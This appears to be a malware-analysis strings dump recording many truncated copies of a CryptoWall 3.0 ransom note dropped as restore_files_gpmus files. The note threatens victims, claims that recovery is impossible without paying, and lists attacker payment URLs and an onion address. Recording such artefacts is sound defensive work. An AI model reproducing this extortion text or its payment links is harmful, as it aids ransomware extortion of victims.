Source: restore_files_gpmus.html80.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html233.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt151.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt124.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html333.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html8.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html129.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html180.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html382.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html341.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt209.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt319.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt167.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt75.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html101.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html26.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt199.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html193.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html222.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt80.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
